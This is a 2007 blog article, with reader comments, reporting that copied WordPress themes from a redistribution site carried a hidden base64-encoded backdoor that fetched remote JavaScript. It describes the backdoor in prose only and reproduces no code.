WordPress is growing quickly – both as a hosted platform and also via standalone blog installations. The rapid growth and its open, flexible approach to blog design, means it may become a target for hackers who embed malicious code within themes they distribute. One of the […]

WordPress is growing quickly – both as a hosted platform and also via standalone blog installations. The rapid growth and its open, flexible approach to blog design, means it may become a target for hackers who embed malicious code within themes they distribute.

One of the reasons for its success is the flexibility it offers for customization. WordPress is built around a central engine, written in PHP, called The Loop. Every time a blog is viewed, The Loop processes each part of the page — a header, the body and posts, a sidebar, and a footer. Blog operators are free to change these elements: They can modify the stylesheets to change fonts and colors. They can change the PHP code to display things like author details, popular tags, and so on. And they can put in plug-ins to further extend the capabilities of their site.

Designers bundle up stylesheets, PHP code, and sometimes plug-ins, into themes. A WordPress theme isn’t just cosmetics: It’s code. If you change a theme in Powerpoint, you’re just changing fonts and colors. But when you change a theme in WordPress, you’re also modifying the underlying structure of the site, including database queries and PHP execution.

The tremendous flexibility this offers gives us the rich variety of blogs available today. WordPress distributes some of these themes through its own theme browser, but themes are also offered by many sites and by individual developers. And WordPress has worked hard to make enabling a new theme as easy as copying it to a blog and clicking on a thumbnail.

With any successful platform, the hackers aren’t far behind. Apple’s Mac is widely regarded as more secure than a Windows PC, but that security may also be a result of fewer people attacking it. So as WordPress grows, it becomes a prime target for attack.

The richness of WordPress themes is an excellent opportunity for attackers. And that code executes on a server, where it can do all kinds of bad things. Because of the ease of theme installation, blog owners who’d never install untested code on a server are deploying themes on their blogs, not realizing that hidden code is coming along for the ride.

Here’s a real example.

Seattle-based designer Derek Punsalan makes acclaimed WordPress themes, and has released several of them to the world. Other theme sites have copied his themes. One such theme copier is WP-Sphere.

When you download Punsalan’s theme from the WP-Sphere site, it contains some extra code that he didn’t include. It’s a long string of cryptic-looking characters that most users wouldn’t question:


The first part of the string offers a clue: It’s using a PHP function to decode the string of text, which is encoded as base64. If we pass this through a decoder, the string looks a lot more malicious:


The code establishes a connection from the WordPress server to several sites wpssr.com, wpsnc.com, and wpsnc2.com, and allows the site operator to download an arbitrary piece of Javascript. The sites are registered to an anonymous registrar in Vancouver, British Columbia.

“These types of theme galleries are taking advantage of unsuspecting WordPress users who assume that the themes they are downloading are no different than the next,” says Punsalan. “Although it is difficult to police and prevent individuals from following requests not to redistribute, it has become quite apparent that the WordPress community needs to make a stand.”

Paul Carroll wrote about this string a couple of weeks ago. He concluded that, at its most innocent, this is a way for WP-Sphere to keep track of who’s using themes, but that it presents an excellent back door for injecting malicious code every time someone visits a site. In theory, WP-Sphere could inject advertising into the pages of people who use their copied, modified themes. Punsalan has a write-up on his blog of the situation as well.

Perhaps most disturbingly, until yesterday, WP-Sphere was the number one paid search result for “WordPress Themes” on Google. Today, there are sites and plug-ins devoted to blog security and detecting vulnerabilities. But WordPress is popular enough that it’s going to have to tackle this directly. The flexibility that makes it great also allows those with malicious intent to put bad code inside the blogs of innocents. Now, the blogging community has to figure out some kind of a certification process that doesn’t stifle innovation.

One approach proposed by Matthew Mullenweg, founding developer of WordPress, is a marketplace consisting of certified, GPL-licensed themes.”This is no different from malware, and in many ways much worse,” says Mullenweg. “All 2000+ themes in our official directory are vetted for this kind of thing, and it’s obviously dangerous.”

[Disclosure: Automattic, a start-up founded by Matt Mullenweg is backed by True Ventures, lead investors in the parent company of this blog.]

 Alistair Croll is a co-founder of Coradiant. He writes about online user performance on Coradiant’s corporate blog and tries to out-guess the future at bitcurrent.com.

You’re subscribed! If you like, you can update your settings

  1. Chat Marchet News Digest » WordPress Themes & Web Security Monday, November 26, 2007

    [...] Read the full story… This entry was posted on Tuesday, November 27th, 2007 at 4:12 am and is filed under le Chat Marchet. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site. [...]

  2. » Malicious Code In Themes and Templates – Webfeed Central Monday, November 26, 2007

    [...] what I read today, specifically talked about WordPress and some extra code that’s already been found in at [...]

  3. It’s true those “cryptic-looking characters” is a code that allows the owner to place a text link ad on the blog of the person that’s using the theme, some designers use the code to prevent bloggers from editing their footer link thus ensuring that the sponsors link remain intact.

  4. Vuelven los problemas con los themes de Wordpress | aNieto2K Tuesday, November 27, 2007

    [...] descubro otro posible caso, digo posible por que no se han pronunciado los grandes de WordPress sobre el tema. Esta vez se [...]

  5. Dr Farrukh Malik Tuesday, November 27, 2007

    This article gives a newer level of understanding regarding security issue with wordpress platform. It’s the wordpress who need to come in action and only than we can have something substantial. The proposed idea of certification for themes and plugins is intelligent one and we need to look into it since it will save many newbies like myself from getting trapped into any malicious act. Thanks for writing such a nice article.

  6. Hackers can easily hack code, if you’re using PHP files as your template files or in other words messing Core logic with UI. You need to use .html or .tpl files as templates as PHPBB and 4Images do. They are a bit slow but yet your code is more secure this way.

  7. Kr±g Starszoharcerski “Matrix” » Blog Archive » Bezpieczeñstwo: skórki Wordpressa Tuesday, November 27, 2007

    [...] jest to bezpodstawna obawa – istniej± do¶æ powa¿ne przes³anki ku temu. Co zatem mo¿na [...]

  8. Wow, I was with you all the way, right up until you said: “Apple’s Mac is widely regarded as more secure than a Windows PC, but that security may also be a result of fewer people attacking it.”

    That arguments been and gone. Warning! Trust rank running low!

    But seriously, this to me sounds like an argument for some kind of registration system. I know it’s onerous, but it would do away with a lot of the security problems.

    An example would be where the template designer registers their template with WordPress, who then issue an MD5 code.

    When anyone then runs the template — which is inside a ‘wrapper’ file — the template itself checks back with WordPress to verify the hash code is valid.

    Or something like that…

  9. You make some excellent points. I believe the multitude of plugins pose similar threat as well although it might be easier to bury such malicious code in a theme. The comment thread in Matt’s post about the WP Theme Marketplace is awesome. Thanks for the reference.

  10. @Wayne:

    His statement that Macs are more secure is true. Just look at the facts. Hackers don’t go after Macs as often. You cannot argue this point. You can say the reason is because Apple has a smaller marketshare, but you cannot honestly argue that Windows computers are more secure than Apple computers.

    I only hope that in making a statement such as this, you have used an Apple computer for a longer period of time than a visit to the Apple store.

Comments have been disabled for this post